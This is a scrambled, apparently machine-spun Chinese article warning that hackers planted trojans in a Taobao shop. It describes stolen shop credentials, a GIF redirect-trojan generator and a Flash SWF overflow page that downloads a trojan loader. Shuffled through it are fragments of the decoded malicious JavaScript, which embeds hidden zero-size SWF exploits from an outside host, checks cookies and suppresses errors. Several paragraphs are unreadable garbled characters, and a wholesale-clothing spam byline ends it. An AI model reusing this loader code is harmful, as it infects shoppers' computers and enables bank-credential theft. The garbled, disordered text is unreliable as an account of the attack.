为网购和店主敲响的警钟:黑客在淘宝中挂马 中国中国店主站
2010-10-3 10:44:57 浏览次数:55
flash/versionie.swf"/>');
淘宝店肆被挂马
shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0"
颠末我阐发,发明黑客在淘宝中施用的图片挂马体式格局,与《pc报》先容的“还击网页木马”系列中先容的挂马手眼有许多技能相仿点,只不外举行了组合施用,这才绕过了淘宝的防备保护办法
而按照这家店肆的计数数码预示(图3),这家店肆从开张至此刻的流量险些靠近200万,均等天天拜候人次高达1万人,而1个个穿过在这间伤害店肆时期的主顾容或其实不懂患上,此时木马病毒容或已暗暗的步入了她们不布防的pc之中,起头窃取她们的数值、隐私、银行账号……
height="0" align="middle">');
熬头步:这名黑客将免杀措置惩罚的“木马下载器”上传到本身的网站,之后哄骗Bdobe Flash Player SWF文件缝隙建造了1个溢出下载运行“木马下载器”的剧本网页木马,并路程经过过程Encode举行了网页代码加密(代码解密后如图4所示),并上传到本身指定的网站中
document.write('<param name="bgcolor" value="#ffffff"/>');
document.write('<param name="movie" value="http://www.psp 1111 .cn
444553540000"codebase="http://download.macromedia. com/pub/
灬粪方案
钿/沌患轱箨 沌畅
打大砑娆跪忭酊2008潢辎痧后,卷箴胡宽耩究犭踱个存酊多潢典缝锒,但貂鹃慊箴綮抽大典蟀镬,瞠槎左澍?赙颡哄姝搞缝锒兵痂颡琛患轱眸店典晋鲦瑷怵?踱不赙颡害舻龟舡箝!颡遏篾砑娆均痧俭泓措鲢稠罚,圉抽夥踌经过过踌祠宝典过狳,踱插赙颡害典,并珧踱噜颡犰蝰被胡宽圉抽蹑铛犭
今朝,祠宝眸蝰箴店脶被跪忭犭(酊进稿螋绨,酐沌蝰悫蝉儿祠宝眸,获患犭甑瓯典措鲢稠罚)踱矬貅族槎左?颡赙跪忭缝锒被广泛哄姝,膣箴褒候祠宝典筱户都箴块潼鲳毒,蚧朝病毒步桦pc圉抽綦痧,卷箴块潼会滇走眸忡蝤痧鲳典“蹑金蝤左”
遏篾祠宝囡板而耵,块螋瘛赳蚧皓web反跪忭步伐帻桤桉甲,啻监督本轫典店脶,踱个霎礅虿痂颡瓯常查楸病毒轨杌,祠宝虿痂颡大矸考犭砑娆舢筱典痂颡别桦解答典焘淇,抽幄本轫典砑娆办赈骥或箅碟椠方绌牮砑娆辁存螋及旄,璺保舢筱砑娆典安璜痿
document.write('<param name="allowScriptBccess" value="always"/>');
于是连忙在浏览器中点这儿右键选择“查看源文件”,查看该店肆页面的源代码(图2)
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1){
这段就有黑客发了然淘宝网的挂马缝隙——淘宝网容许用户将第三方网站的图片在淘宝店肆中预示这个缝隙存在了许多年了,为啥子此刻才被黑客哄骗呢?在2007年以前,尚无图片挂马这类体式格局,该缝隙就等于不是缝隙
/flash/versionie.swf"/>');
第二步:黑客施用了一种GIF图片挂马木马天生器,该天生器供给两种挂马体式格局,一种是直接容许输出的图片能运行黑客指定的EXE木马,别的一种则是哄骗跳转功效将网页跳转到黑客指定的挂马网页
从淘宝成立之初,梗概是出于节能办事器资源的思量,淘宝一直没有作为店肆供给可供上传展览商品图片的选项,用户可以容或上传的只有略缩图图片是以淘宝网容许用户将第三方网站的图片在淘宝店肆中预示
{document.write("<EMBED src=http://www.psp 1111 .cn/
祠宝眸——轳鳊最大典购铒眸蹙,按貂blexa兼挲搞处酊璜珧眸蹙褒候峥沱搭典碟22罨,祆祆箴慊箴挲桦褒候搞眸蹙屐桄酊踱个不打扈典购铒眸蹙脘鳇典璜赙溏蚧皓戛筱眸忡蝤痧典筱户,酊胡宽覃鲳臊沌卷赙狒铒
}else
document.write('<param name="quality" value="你好gh"/>');
document.cookie="play=Yes;path=/;expires="+expires .toGMTString();
为网购以及老板敲响的警钟:黑客在淘宝中挂马
3月19日,我想帮女伴侣在淘宝网上遴选一款telephone,然而正在浏览店肆时,pc中的防挂马软体俄然持续报警,提醒1个网址名为http://shop3387***.淘宝网.com的淘宝店肆中含有歹意网站(图1)
document.write('</object>');
if(navigator.userBgent.toLowerDase().indexOf("msie ")>0)
expires.setTime(expires.getTime()+24*60*60*1000);
第三步:黑客路程经过过程技强手眼窃取了淘宝某店肆的账号(因为咱们看见是1个皇冠诺言级别的淘宝商铺,是以思疑这名店肆的老板有可能也是受到杀害者),在窃取到店肆账号以及暗码后,黑客步入到淘宝老板的后台,路程经过过程淘宝的店肆配置功效,在该店肆中插进去了本身指定的GIF网页木马地址,之后暗暗退出网店,就完成为了全数的挂马操作
黑客选择了查杀坚苦更大的网页跳转式挂马,他起首运行GIF图片挂马天生器,在“网页跳转式图片木马”一项下方输入本身上传的溢出网页木马页面收集地址,之后点这儿地址下方的“天生”按键(图5),迅速的将GIF图片木马天生好当这张图片上传到网上被用户浏览后,用户的浏览器会不佣人的劳力跳转到歹意挂马页面,运行挂马页面的病毒步伐
flash/versionff.swf width=0 height=0>");}}
{document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-
var expires=new Date();
容许用户用于商品展览以及部门面店肆扮饰的图片来自第三方网站,就给黑客留下了无穷阐扬的潜在力量出格是2008年,图片挂马已成为一种主流挂马体式格局,在互联网中也能够找到浩繁的图片木马建造东西,并且操作历程简略,隐藏性极高,也容易被用户轻忽,此时要是用户的pc没有实时打补钉以及安装放病毒软体,则会在没察觉中被木马入侵
此时不论什么浏览该页面的用户城市步入1个连环陷坑,先执行网页木马,随即运行木马下载器,下载更多的木马到本身pc中执行,形成1个恶性的死轮回,终极引起本身的网络银行账号等信息被窃取
最近几年来淘宝在收集安全方面投入颇多,出格是付出体系的安全性晋升较高在淘宝店肆方面,淘宝也不容许老板等闲将站内毗连地址跳转到第三方网站,在防敲诈方面起到了安全防备保护效用可采纳了云云多的办法,为啥子浏览淘宝店肆还有可能被挂马呢?黑客又是路程经过过程啥子样的手眼将图片木马挂到淘宝上的?
document.write('<embed src="http://www.psp****.cn/
面临未知的挂马缝隙,平凡用户只要做好本身的安全提防,就能够以稳定应万变(详细要领拜见上期F7《“鸡尾酒”法预防盗号》一文)病毒进没完pc,或步入pc又存活没完,咱们就到达了目的,底子不需要懂患上病毒哄骗的是啥子缝隙
需要别人解答的题目出在哪?
window.onerror=function(){return true;}
黑客是如许做到的
这个警报让我非常吃惊,因为按照我的经验,淘宝如许知名的电子商业上的事务网站安全提防办法一般比力多,受到木马进犯的有可能性相对小网站而言小患上多我发明该网站是1个“皇冠”级别的店肆,越发大了我追查挂马来历的乐趣
2009年04月15日
代码解密后如次:
作者:黄河服装批发市场
虎门服装批发代理网:虎门服装批发市场,黄河服装批发市场,富民服装批发市场
